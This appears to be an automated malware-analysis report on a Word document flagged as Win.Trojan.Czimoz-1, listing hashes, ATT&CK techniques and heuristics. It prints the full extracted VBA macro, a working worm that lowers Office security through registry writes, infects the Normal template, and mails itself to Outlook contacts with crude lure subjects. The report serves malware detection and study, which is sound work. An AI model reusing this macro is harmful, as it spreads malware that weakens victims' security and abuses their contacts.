Win.Trojan.Czimoz-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 798d3d1de186226a…

MALICIOUS

Office (OLE)

31.5 KB Created: 2006-03-31 13:57:00 Authoring application: Microsoft Office Word First seen: 2012-06-14
MD5: ade05b8527700fae15450ea3e9438e43 SHA-1: f6ff08de971606d6dcc9e116a9d8b404a3caaf75 SHA-256: 798d3d1de186226a3b314942a4116dc6df780b5342e53d410c9487522570fde1
262 Risk Score

Malware Insights

Win.Trojan.Czimoz-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic T1547.001 Registry Run Keys / Startup Folder T1566.001 Spearphishing Attachment

The VBA macro contains critical firings for Shell() calls and CreateObject, indicating it attempts to execute arbitrary code. It also writes to registry keys related to Office security settings, likely to lower them and facilitate further execution. The macro's intent appears to be to display a social engineering lure to the user, as evidenced by the constructed strings like 'Make your dreams come true!'.

Heuristics 7

  • ClamAV: Win.Trojan.Czimoz-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Czimoz-1
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Rem Word2007.zabijaka (c)by Necronomikon[DCA]
    Dim s(3) As String, e, shell
    Dim f(3) As String, lang
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Dim f(3) As String, lang
    Set shell = CreateObject(("WScript" + ".Shell"))
    RegPath = "HKCU\Software\Microsoft\Office\12.0\Word\Security\"
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    shell.RegWrite "HKCU\Software\Office\12.0\Word\Options\DefaultFormat", "Doc97"
    M = CallByName(VBE.ActiveCodePane.codemodule, "Lines", VbGet, 1, 61)
    If CallByName(Application, "MacroContainer", VbGet) = NormalTemplate Then
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/officeart/2005/8/oartml In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 2464 bytes
SHA-256: c617df92ad1c1b9b7012832c7fd3964d0572f6bdb2f8cee6a7621452189f0ed6
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub document_close()
Rem Word2007.zabijaka (c)by Necronomikon[DCA]
Dim s(3) As String, e, shell
Dim f(3) As String, lang
Set shell = CreateObject(("WScript" + ".Shell"))
RegPath = "HKCU\Software\Microsoft\Office\12.0\Word\Security\"
shell.RegWrite RegPath & "Level", 1, "REG_DWORD"
shell.RegWrite RegPath & "AccessVBOM", 1, "REG_DWORD"
RegPath1 = "HKCU\Software\Microsoft\Office\12.0\Outlook\Security\"
shell.RegWrite RegPath1 & "Level", 1, "REG_DWORD"
shell.RegWrite "HKCU\Software\Office\12.0\Word\Options\DefaultFormat", "Doc97"
M = CallByName(VBE.ActiveCodePane.codemodule, "Lines", VbGet, 1, 61)
If CallByName(Application, "MacroContainer", VbGet) = NormalTemplate Then
Set k = ActiveDocument.VBProject.vbcomponents(1).codemodule
Else
Set k = NormalTemplate.VBProject.vbcomponents(1).codemodule
End If
CallByName k, "Deletelines", VbMethod, 1, CallByName(k, "Countoflines", VbGet)
CallByName k, "Addfromstring", VbMethod, M
f(1) = "Readme.doc"
f(2) = "Password.doc"
f(3) = "Help.doc"
lang = shell.RegRead("HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\Locale\")
If (lang = "00000407") Then
s(1) = "Mach deine Träume wahr!"
s(2) = "Willst du ficken?"
s(3) = "Könnten Sie mir helfen?"
ElseIf (lang = "00000415") Then
s(1) = "Spelnij swoje marzenia!"
s(2) = "Chce cie jebac?"
s(3) = "Czy moze mi pan pomóc?"
Else
s(1) = "Make your dreams come true!"
s(2) = "Wanna fuck?"
s(3) = "Can you help me?"
End If
Randomize
e = Int(Rnd * 3) + 1
RandomSubject = s(e)
q = Int(Rnd * 3) + 1
Randomfilez = f(q)
Set Ne_OApp = CreateObject(("Outlook." + "Application"))
Set Ne_Mapi = Ne_OApp.GetNameSpace(("MA" + "PI"))
For Each Ne_AddList In Ne_Mapi.AddressLists
Next
If Ne_AddList.AddressEntries.Count <> 0 Then
For Ne_AddListCount = 1 To Ne_AddList.AddressEntries.Count
Next
Set Ne_AddListEntry = Ne_AddList.AddressEntries(Ne_AddListCount)
Set Ne_msg = Ne_OApp.CreateItem(0)
Ne_msg.To = Ne_AddListEntry.Address
Ne_msg.Subject = RandomSubject
Ne_msg.Body = ""
Ne_msg.Attachments.Add Randomfilez
Ne_msg.Importance = 2
Ne_msg.DeleteAfterSubmit = True
End If
If Ne_msg.To <> "" Then
Ne_msg.Send
End If
End Sub